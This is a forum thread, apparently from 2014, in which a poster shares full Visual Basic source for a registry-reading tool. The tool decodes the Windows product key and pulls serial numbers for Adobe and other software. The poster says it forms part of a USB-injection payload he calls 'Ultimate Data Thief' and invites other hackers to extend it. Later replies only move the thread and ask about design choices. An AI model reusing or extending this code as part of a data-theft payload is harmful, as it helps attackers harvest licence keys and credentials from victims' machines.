UnKn0wnBooof Posted February 16, 2014 Share Posted February 16, 2014 (edited) ALL HACKERS UNITE! Recover as many product keys as possible via the Windows registry Ok, so I've started writing in Microsoft Visual Basic (2010) again, and I've already written scripts to recover a few product keys but I believe that if we all work together, then we can build the ultimate command line product key recovery tool. All I need is the location of the product keys and key names, such as HKEY_LOCAL_MACHINE\Software\Company\Product\Registration\ProductKey Using these locations of keys, I can simply implement these locations into the recovery program. This program is currently integrated into my duck payload "Ultimate Data Thief" and is named Wind (recovering keys is a breeze) , but it only recovers Windows product keys and was updated last year. Now that I've started working on the project again, I want the hacker community to make it better as well as open source. This is the contents of the Main.vb file: Imports System Imports System.IO Imports Microsoft.Win32 Module Main Sub Main() Console.WriteLine(GetKeyDataWindows) Console.WriteLine(GetKeyDataAbyssQBFC) Console.WriteLine(GetKeyDataAdobeAcrobat6) Console.WriteLine(GetKeyDataAdobeAcrobat7) Console.WriteLine(GetKeyDataAdobeAcrobat8) Console.WriteLine(GetKeyDataAdobePhotoshop7) Console.WriteLine(GetKeyDataAdvancedDirectRemailerTweakMarketing) Console.WriteLine(GetKeyDataAdvancedDirectRemailerElcom) Console.WriteLine(GetKeyDataAdobeAfterEffects7) Console.WriteLine(GetKeyDataAlcohol120per19x) Console.ReadKey() End Sub Public Function GetKeyDataWindows() As String Dim RegKeyWindows As RegistryKey = _ Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows NT\CurrentVersion", False) Dim bytDPID() As Byte = RegKeyWindows.GetValue("DigitalProductID") Dim bytKey(14) As Byte '0-14 = 15 bytes Array.Copy(bytDPID, 52, bytKey, 0, 15) Dim strCharWindows As String = "BCDFGHJKMPQRTVWXY2346789" Dim strKeyWindows As String = "" For j As Integer = 0 To 24 Dim nCur As Short = 0 For i As Integer = 14 To 0 Step -1 nCur = CShort(nCur * 256 Xor bytKey(i)) bytKey(i) = CByte(Int(nCur / 24)) nCur = CShort(nCur Mod 24) Next strKeyWindows = strCharWindows.Substring(nCur, 1) & strKeyWindows Next For i As Integer = 4 To 1 Step -1 strKeyWindows = strKeyWindows.Insert(i * 5, "-") Next Dim WinVersion As String = RegKeyWindows.GetValue("ProductName") Dim WinOEM As String = RegKeyWindows.GetValue("ProductId") Return "Microsoft - " & WinVersion & ",Key: " & strKeyWindows & ",OEM: " & WinOEM End Function Public Function GetKeyDataAbyssQBFC() As String Dim RegKeyAbyssQBFCUser = CStr(My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\Abyssmedia\Quick Batch File Compiler\Settings", "user", Nothing)) If Not RegKeyAbyssQBFCUser Is Nothing Then Dim RegKeyAbyssQBFCKey = CStr(My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\Abyssmedia\Quick Batch File Compiler\Settings", "key", Nothing)) If Not RegKeyAbyssQBFCKey Is Nothing Then Return "Abyss - Quick Batch File Compiler,User: " & RegKeyAbyssQBFCUser & ",Key: " & RegKeyAbyssQBFCKey End If End If End Function Public Function GetKeyDataAdobeAcrobat6() As String Dim RegKeyAdobeAcrobat6 = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\6.0\Registration", "SERIAL", Nothing)) If Not RegKeyAdobeAcrobat6 Is Nothing Then Return "Adobe - Acrobat 6,Key: " & RegKeyAdobeAcrobat6 End If End Function Public Function GetKeyDataAdobeAcrobat7() As String Dim RegKeyAdobeAcrobat7 = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\7.0\Registration", "SERIAL", Nothing)) If Not RegKeyAdobeAcrobat7 Is Nothing Then Return "Adobe - Acrobat 7,Key: " & RegKeyAdobeAcrobat7 End If End Function Public Function GetKeyDataAdobeAcrobat8() As String Dim RegKeyAdobeAcrobat8 = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\8.0\Registration", "SERIAL", Nothing)) If Not RegKeyAdobeAcrobat8 Is Nothing Then Return "Adobe - Acrobat 8.x,Key: " & RegKeyAdobeAcrobat8 End If End Function Public Function GetKeyDataAdobePhotoshop7() As String Dim RegKeyAdobePhotoshop7 = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Photoshop\7.0\Registration", "SERIAL", Nothing)) If Not RegKeyAdobePhotoshop7 Is Nothing Then Return "Adobe - Photoshop 7,Key: " & RegKeyAdobePhotoshop7 End If End Function Public Function GetKeyDataAdvancedDirectRemailerTweakMarketing() As String Dim RegKeyAdvancedDirectRemailerTweakMarketing = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Tweak Marketing\Advanced Direct Remailer\Registration", "code", Nothing)) If Not RegKeyAdvancedDirectRemailerTweakMarketing Is Nothing Then Return "Tweak Marketing - Advanced Direct Remailer,Key: " & RegKeyAdvancedDirectRemailerTweakMarketing End If End Function Public Function GetKeyDataAdvancedDirectRemailerElcom() As String Dim RegKeyAdvancedDirectRemailerElcom = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Elcom\Advanced Direct Remailer\Registration", "code", Nothing)) If Not RegKeyAdvancedDirectRemailerElcom Is Nothing Then Return "Elcom - Advanced Direct Remailer,Key: " & RegKeyAdvancedDirectRemailerElcom End If End Function Public Function GetKeyDataAdobeAfterEffects7() As String Dim RegKeyAdobeAfterEffects7Name = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\After Effects\7.0\Registration", "NAME", Nothing)) If Not RegKeyAdobeAfterEffects7Name Is Nothing Then Dim RegKeyAdobeAfterEffects7Key = CStr(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\After Effects\7.0\Registration", "Serial", Nothing)) Return "Adobe - After Effects 7,Name: " & RegKeyAdobeAfterEffects7Name & ",Key: " & RegKeyAdobeAfterEffects7Key End If End Function Public Function GetKeyDataAlcohol120per19x() As String Dim RegKeyAlcohol120per19xName = CStr(My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%\Info", "UserName", Nothing)) If Not RegKeyAlcohol120per19xName Is Nothing Then Dim RegKeyAlcohol120per19xKey = CStr(My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%\Info", "ServerKey", Nothing)) If Not RegKeyAlcohol120per19xKey Is Nothing Then Return "Alcohol Soft - Alcohol 120% 1.9.x,Name: " & RegKeyAlcohol120per19xName & ",Key: " & RegKeyAlcohol120per19xKey End If End If End Function End Module Sooo, you lot in? Help is most appreciated. Edited February 16, 2014 by Lavanoid Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted February 16, 2014 Share Posted February 16, 2014 Not really the correct spot to post in Rubber Ducky. Moved. Also: http://www.magicaljellybean.com/keyfinder/ Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 18, 2014 Author Share Posted February 18, 2014 Not really the correct spot to post in Rubber Ducky. Moved. Also: http://www.magicaljellybean.com/keyfinder/ Oh. Sorry, I thought the ducky forum would be appropriate since the program is used in my Duck payload. Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 18, 2014 Author Share Posted February 18, 2014 Not really the correct spot to post in Rubber Ducky. Moved. Also: http://www.magicaljellybean.com/keyfinder/ Also, magical jelly bean has no command line support. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 23, 2014 Share Posted February 23, 2014 Why does it need to be CLI? Quote Link to comment Share on other sites More sharing options...
newbi3 Posted February 24, 2014 Share Posted February 24, 2014 Why Visual Basic? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.